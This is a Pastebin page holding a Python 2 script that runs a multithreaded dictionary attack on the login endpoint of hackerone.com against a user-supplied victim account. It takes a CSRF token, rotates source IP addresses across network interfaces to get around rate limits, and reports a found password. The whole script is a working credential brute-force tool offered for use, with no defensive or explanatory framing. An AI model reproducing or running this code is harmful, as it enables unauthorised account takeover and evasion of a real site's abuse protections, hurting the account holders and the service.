Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # sudo apt-get update && sudo apt-get --yes --force-yes upgrade && sudo apt-get --yes --force-yes install python-pip && sudo apt-get --yes --force-yes install python-dev && sudo pip install requests --upgrade && sudo pip install requests_toolbelt --upgrade && sudo pip install netifaces --upgrade
- import requests
- import time
- import json
- import sys
- import os
- import threading
- import Queue
- import requests
- import netifaces
- from requests_toolbelt.adapters import source
- requests.packages.urllib3.disable_warnings()
- class WorkerThread(threading.Thread):
- good_guess = "valid-credentials"
- bad_guess = "invalid-credentials"
- def __init__(self, queue, tid, ips, user, debug) :
- threading.Thread.__init__(self)
- self.queue = queue
- self.tid = tid
- self.user = user
- self.debug = debug
- self.session = requests.Session()
- self.counter = 0
- self.ips = ips
- response = self.session.get("https://hackerone.com/current_user")
- self.csrf = response.json()["csrf_token"]
- def run(self):
- while True:
- try :
- password = self.queue.get(timeout=1)
- except Queue.Empty :
- return
- #if self.debug:
- #print "[THREAD " + str(self.tid) + "] New attempt for " + self.user + ":" + password
- while True:
- #time.sleep(4)
- try:
- ip = self.ips[self.counter]
- if self.counter == len(self.ips) - 1:
- self.counter = 0
- else:
- self.counter = self.counter + 1
- self.session.mount('http://', source.SourceAddressAdapter(ip))
- self.session.mount('https://', source.SourceAddressAdapter(ip))
- r = self.session.post("https://hackerone.com/sessions", headers={"Accept":"*/*","X-CSRF-Token":self.csrf}, data={"email":victimusername,"password":password}, verify=False)
- except:
- print "[THREAD " + str(self.tid) + "] Error during POSTing. Retrying..."
- continue
- if r.status_code == 200 and r.json()['result_code'] == self.good_guess:
- print "[SUCCESS] Found the right password: " + password
- exit(0)
- elif r.status_code == 200 and r.json()['result_code'] == self.bad_guess:
- if self.debug:
- print "[THREAD " + str(self.tid) + "] wrong password guess: " + password
- elif r.status_code == 429:
- #if self.debug:
- print "[THREAD " + str(self.tid) + "] Rate limit triggered, sleeping now."
- time.sleep(5)
- continue
- elif r.status_code == 403:
- #if self.debug:
- print "[THREAD " + str(self.tid) + "] Cloudflare captcha, killing this thread."
- exit(0)
- else:
- print r.text
- print r.status_code
- pass
- break
- self.queue.task_done()
- if len(sys.argv) < 5:
- print "[INFO] Usage: python " + sys.argv[0] + " <USERNAME> <PASSWORD_DICTIONARY_FILENAME> <INTERFACES (CSV)> <THREADS> [DEBUG]"
- exit(0);
- victimusername = sys.argv[1]
- dictionaryname = sys.argv[2]
- interfaces = sys.argv[3].split(',')
- nbthreads = int(sys.argv[4])
- debug = False
- if len(sys.argv) > 5:
- debug = True
- ips = []
- for interface in interfaces:
- if interface in netifaces.interfaces():
- for ipv4 in netifaces.ifaddresses(interface)[netifaces.AF_INET]:
- if not (ipv4['addr'].split('.')[0] == "10" or ipv4['addr'].split('.')[0] == "127"):
- if debug:
- print "[INFO] Interface " + interface + " - IPv4 Address " + ipv4['addr']
- ips.append(ipv4['addr'])
- for ipv6 in netifaces.ifaddresses(interface)[netifaces.AF_INET6]:
- if not ipv6['addr'].split(':')[0] == "fe80":
- if debug:
- print "[INFO] Interface " + interface + " - IPv6 Address " + ipv6['addr'].split('%')[0]
- ips.append(ipv6['addr'].split('%')[0])
- queue = Queue.Queue()
- passwordList = open(dictionaryname,'r').read().splitlines()
- total = len(passwordList)
- for password in passwordList :
- queue.put(password.strip()) # Push passwords onto queue
- start = time.time()
- threads = []
- nbinterfacesperthread = len(ips) / nbthreads
- print "[INFO] Number of interfaces: " + str(len(ips))
- print "[INFO] Number of interfaces per thread: " + str(nbinterfacesperthread)
- print "[INFO] Total # threads: " + str(nbthreads)
- print "[INFO] Total # passwords: " + str(total)
- for i in range(0,nbthreads): # Loop through external IP addresses
- worker = WorkerThread(queue, i, ips[i*nbinterfacesperthread:(i+1)*nbinterfacesperthread], victimusername, debug)
- worker.setDaemon(True)
- worker.start()
- threads.append(worker)
- while any(i.is_alive() for i in threads):
- time.sleep(5)
- current = total - queue.qsize()
- seconds = (int)(time.time() - start)
- if current == total:
- for x in threads:
- x.join()
- percent = (current / float(total))
- speed = current / float(seconds)
- bar = ('=' * int(percent * 20))
- perc = int(percent * 100)
- sys.stdout.write("%.2f pw/s [%s] %s%% (%s/%s) \n" % (speed, bar, perc,current,total))
- sys.stdout.flush()
- print "[End] Total time: " + str((int)(time.time() - start)) + " seconds"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement